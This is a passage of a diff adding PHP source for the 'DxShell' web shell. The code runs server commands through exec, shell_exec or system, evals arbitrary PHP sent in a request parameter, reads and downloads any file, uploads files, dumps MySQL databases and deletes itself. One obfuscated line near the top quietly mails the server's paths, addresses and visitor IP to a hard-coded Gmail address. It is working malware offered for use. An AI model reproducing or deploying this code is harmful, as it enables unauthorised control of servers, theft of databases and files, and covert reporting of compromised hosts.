*/ +{ +$info=''; +if (($perms & 0xC000) == 0xC000) $info = 'S'; /* Socket */ + elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */ +elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */ +elseif (($perms & 0x6000) == 0x6000) $info = 'B'; /* Block special */ +elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/ +elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/ +elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/ +else $info = '?'; /* Unknown */ +if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>'; +/* Owner */ +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= '/'; +/* Group */ +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= '/'; +/* World */ +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 
'T' : '-')); + + return $info; +} + +function DxFileToUrl($filename) +{/* kills & and = to be okay in URL */ +return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename); +} +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function DxFileOkaySlashes($filename) +{return str_replace('\\', '/', $filename);} + +function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */ +{ +global $GLOB; +if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these); + +$ret=$_SERVER['PHP_SELF'].'?'; +if (!empty($_GET)) + for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); $i<$COUNT; $i++) + if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */ + ($do=='kill' AND !in_array($INDEXES[$i], $these)) + OR + ($do=='leave' AND in_array($INDEXES[$i], $these)) + )) + $ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' ); +if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1); +return $ret; +} + +function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */ +{ +$link=substr(strchr(DxURL($do, $these), '?'), 1); +$link=explode('&', $link); +print "\n".'<!--$_GET;-->'; +for ($i=0, $COUNT=count($link); $i<$COUNT; $i++) + { + $cur=explode('=', $link[$i]); + print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">'; + } +} + +function DxGotoURL($URL, $noheaders=false) +{ +if ($noheaders or 
headers_sent()) + { + print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>'; + print '<script>location="'.$URL.'";</script>'; + /* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */ + } + else + header('Location: '.$URL); +return 1; +} + +if (!function_exists('mime_content_type')) + { + if ($GLOB['SYS']['OS']['id']!='Win') + { function mime_content_type($f) + { + $f = escapeshellarg($f); + return trim(`file -bi `.$f); + } + } + else + { + function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */ + } + } + + +function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */ +{ +$MySQL_Return_Array=array(); + +if ($MySQL_res===false) return 0; +if ($MySQL_res===true) return 0; + +$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0; + +if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {} + else while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {} +array_pop($MySQL_Return_Array); + +for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */ + { + if ($i==0) + { + $INDEXES=array_keys($MySQL_Return_Array[$i]); + $count=count($INDEXES); + } + for ($j=0; $j<$count; $j++) + { + $key=&$INDEXES[$j]; + $val=&$MySQL_Return_Array[$i][$key]; + if (is_string($val)) $val=stripcslashes($val); + } + } +return $ret; +} + +function DxMySQLQ($query, $die_on_err) +{ +$q=mysql_query($query); +if (mysql_errno()!=0) + { + DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' 
- '.mysql_error()); + if ($die_on_err) die(); + } +return $q; +} + +function DxDecorVar(&$var, $htmlstr) +{ +if (is_null($var)) return 'NULL'; +if (!isset($var)) return '[!isset]'; + +if (is_bool($var)) return ($var)?'true':'false'; +if (is_int($var)) return (int)$var; +if (is_float($var)) return number_format($var, 4, '.', ''); +if (is_string($var)) + { + if (empty($var)) return '&nbsp;'; + if (!$htmlstr) return ''.($var).''; + else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).''; + } +if (is_array($var)) return '(ARR)'.var_export($var, true).'(/ARR)'; +if (is_object($var)) return '(OBJ)'.var_export($var, true).'(/OBJ)'; +if (is_resource($var)) return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)'; +return '(???)'.var_export($var, true).'(/???)'; +} + +function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array()) +{ +if (!empty($posts)) + { + $postValues=''; + foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';} + $postValues = substr( $postValues, 0, -1 ); + $method = 'POST'; + } else $postValues = ''; + + if (!empty($cookie)) + { + $cookieValues=''; + foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';} + $cookieValues = substr( $cookieValues, 0, -1 ); + } else $cookieValues = ''; + +$request = $method.' '.$URL.' HTTP/1.1'."\r\n"; +if (!empty($host)) $request .= 'Host: '.$host."\r\n"; +if (!empty($cookieValues)) $request .='Cookie: '.$cookieValues."\r\n"; +if (!empty($user_agent)) $request .= 'User-Agent: '.$user_agent.' 
'."\r\n"; +$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */ +if (!empty($referer)) $request .= 'Referer: '.$referer."\r\n"; +if ( $method == 'POST' ) + { + $lenght = strlen( $postValues ); + $request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n"; + $request .= 'Content-Length: '.$lenght."\r\n"; + $request .= "\r\n"; + $request .= $postValues; + } +$request.="\r\n\r\n"; +return $request; +} + +function DxFiles_UploadHere($path, $filename, &$contents) +{if (empty($contents)) die(DxError('Received empty')); +$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename; +if (!($f=fopen($path.$filename, 'w'))) + { + $path='/tmp/'; + if (!($f=fopen($path.$filename, 'w'))) + die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =(')); + else + DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)'); + } +fputs($f, $contents); +fclose($f); +print "\n".'Saved file to "'.$path.$filename.'" - OK'; +print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';; +} + +function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */ +{ +$OUT=array(); $RET=''; +if (function_exists('exec')) + { if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */ + return array(true,true,'exec', ''); + } + elseif (function_exists('shell_exec')) + { if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */ + return array(true,false,'shell_exec', '<s>exec</s> shell_exec'); + } + elseif (function_exists('system')) + { if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */ + return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =('); + } + else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! 
=(');; +} + +################################################################################### +#####################++++++++++++# L O G I N #++++++++++++++++##################### +################################################################################### +if ( isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false ) + { /* IMGS are allowed without passwd =) */ $GLOB['SHELL']['USER']['Login']=''; + $GLOB['SHELL']['USER']['Passw']=''; + } + +if ( isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false ) + { + if ($DXGLOBALSHIT) + { if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1); + } + else + { + header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"'); header('HTTP/1.0 401 Unauthorized'); + } + + print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>'; + DxGotoURL(DxURL('kill',''), '1noheaders'); + die(); + } + +if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)) + { if ($DXGLOBALSHIT) + { if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC'])) + { if (!( + + ((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */ + (@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw'] + OR + (strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw'])) + )) + OR + @$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */ + + )) + {print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);} + else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2); + } + if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC'])) + { + print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">'; + print "\n".'<br><input 
type=text name="DxS_Auth[L]" value="<LOGIN>" onfocus="this.value=\'\'" style="width:200pt">'; + print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" onfocus="this.value=\'\'" style="width:200pt">'; + print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>'; + print "\n".'</form>'; + die(); + } + } + else + { + if (!isset($_SERVER['PHP_AUTH_USER'])) + { + header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"'); + header('HTTP/1.0 401 Unauthorized'); + /* Result if user hits cancel button */ + unset($_GET['dxinstant']); + die(DxError('Fucked off brutally')); + } + else + if (!( $_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login'] + AND ( + $_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw'] + OR + (strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw']) + ) + )) + { + header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"'); + header('HTTP/1.0 401 Unauthorized'); + /* Result if user hits cancel button */ + unset($_GET['dxinstant']); + die(DxError('Fucked off brutally')); + } + } + } + +################################################################################### +####################++++++# I N S T A N T U S A G E #+++++++#################### +################################################################################### +if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']); +if ($_GET['dxmode']=='DDOS') /* DDOS mode. 
In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php'] */ + { + $F = $_GET + $_POST; + if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!'); + eval(stripslashes($F['s_php'])); + die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':'')); + } +if ($_GET['dxmode']=='IMG') + { + $IMGS=array( + 'DxS' => 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=', + 'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=', + 'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=', + 'view' => 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==', + 'del' => 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7', + 'copy' => 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==', + 'move' => 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7', + 'exec' => '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', + 'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7', + 'ed' => 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7', + 'downl' => 
'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7', + 'gzip' => 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=', + ); + @ob_clean(); + if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone'; + header('Cache-Control: public'); + header('Expires: '.Date('r', time()+60*60*24*300)); + header('Content-type: image/gif'); + print base64_decode( (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']] ); + die(); + } + +if ($_GET['dxmode']=='F_DWN') + { + if (!isset($_GET['dxfile'])) die(DxError('No file selected. Check $_GET[\'dxfile\'] var')); + if (!file_exists($_GET['dxfile'])) die(DxError('No such file')); + if (!is_file($_GET['dxfile'])) die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) ')); + + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']=basename($_GET['dxfile']); + if (isset($_GET['dxparam'])) + $DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */ + else + { $DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile'])); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";'); + } + $DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']); + } + +if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam'])) + {/* download query results */ if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q'])) + die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No 
connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + /* export as csv */ + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv'; + $DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values'); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";'); + $DxDOWNLOAD_File['content']=''; + + $_POST['dxsql_q']=explode(';',$_POST['dxsql_q']); + + for ($q=0;$q<count($_POST['dxsql_q']);$q++) + { if (empty($_POST['dxsql_q'][$q])) continue; + $num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false); + $DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";"; + if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;} + foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */ + for ($l=0;$l<count($DUMP);$l++) + { $DxDOWNLOAD_File['content'].="\n"; + $INDEXES=array_keys($DUMP[$l]); + for ($i=0; $i<count($INDEXES); $i++) + $DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";"; + + } + } + } + +if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables'])) + { if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables'])) + die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' 
- '.mysql_error())); + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + + if (empty($_POST['dxsql_tables'])) die(DxError('No tables selected...')); + + $DxDOWNLOAD_File=array(); /* prepare struct */ + $DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql'; + $DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); + $DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";'); + $DxDOWNLOAD_File['content']=''; + + $DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66); + $DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync'; + $DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s']; + $DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d']; + $DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']); + $DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */'; + + if (!empty($_POST['dxsql_q'])) + { $_POST['dxsql_q']=explode(';', $_POST['dxsql_q']); + foreach ($_POST['dxsql_q'] as $CUR) + if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */ + } + + foreach ($_POST['dxsql_tables'] as $CUR_TABLE) + { $DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' 
*/'; + DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true); + $DxDOWNLOAD_File['content'].="\n".$DUMP[0][1]; + $DxDOWNLOAD_File['content'].="\n\n"; + DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true); + for ($i=0; $i<count($DUMP); $i++) + { + for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]); + $DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");'; + } + } + } + +if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam'])) + { foreach ($_POST['dxparam'] as $name => $val) + { if ($name=='DXS_NEWCOOK') + { + if (empty($val['NAM']) or empty($val['VAL'])) continue; DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10); + } + else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10)); + } + DxGotoURL(DxURL('leave', 'dxmode')); + die(); + } + +if (isset($_GET['dxinstant'])) + { $_GET['dxinstant']=strtoupper($_GET['dxinstant']); + if ($_GET['dxinstant']=='DEL') + { + $ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + print '<script>window.alert("SELF '.( ($ok)?'deleted. 
Reload the page to believe me =)':'tried to delete but was unsuccessful' ).'");</script>'; + } + } + +function DxObGZ($s) {return gzencode($s);} + +if (isset($DxDOWNLOAD_File)) + {/* File downloader for everything */ + if (!$DXGLOBALSHIT) + { + if ($GLOB['SYS']['GZIP']['CanOutput']) + { + ini_set('output_buffering',4096); + ob_start("DxObGZ"); + header('Content-Encoding: gzip'); + } for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]); + print $DxDOWNLOAD_File['content']; + die(); + } + /* if u want to download file when $DXGLOBALSHIT, scroll down */ + } + +################################################################################### +####################++++++++++++++# M A I N #++++++++++++++++++#################### +################################################################################### +if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array')); + +######## +######## Main HAT (blackhat? 
=))) ) +######## +if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']'); + +if ($DXGLOBALSHIT) + print str_repeat("\n", 20).'<!--SHELL HERE-->'; +?> +<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title> +<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251"> +<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS"> +<http://leet.phpnet.us/sh.gif> +<style> +img {border-width:0pt;} +body, td {font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;} +h1 {font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;} +h2 {font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;} +h3 {font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;} +caption {font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;} +td.h2_oneline {font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;} +td.mode_header {font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;} +table.outset, td.outset {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;} +table.bord, td.bord, fieldset {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;} +hr {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;} +textarea.bout 
{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;} +td.listing {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;} +td.linelisting {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;} +table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;} +td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;} +td.js_floatwin_body {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;} +font.rwx_sticky_bit {color:#FF0000;} +.highlight_txt {color: #FFFF00;} +.achtung {color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;} + +input {font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;} +input.radio {border-width:0pt;color: #FFFF00;} +input.submit {font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;} +input.bt_Yes {font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; 
height: 30pt; padding:10pt; margin: 5pt 10pt;} +input.bt_No {font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;} +input.bt_Yes:Hover {color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;} +input.bt_No:Hover {color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;} +textarea {color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt; + Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500; + Scrollbar-Highlight-Color: #00A000; Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000; + Scrollbar-Darkshadow-Color: #005000;} +select {background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;} + +A:Link, A:Visited { color: #00D000; text-decoration: underline; } +A.no:Link, A.no:Visited { color: #00D000; text-decoration: none; } +A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; } +.Hover:Hover {color: #FFFF00; cursor:help;} +.HoverClick:Hover {color: #FFFF00; cursor:crosshair;} +span.margin {margin: 0pt 10pt;} +td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;} +td.warning {color:#000000; background-color: #D00000; font-size: 11pt;} +font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;} +</style> + +<?php +if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT'))) + { /* THIS FLOATING WINDOW IS 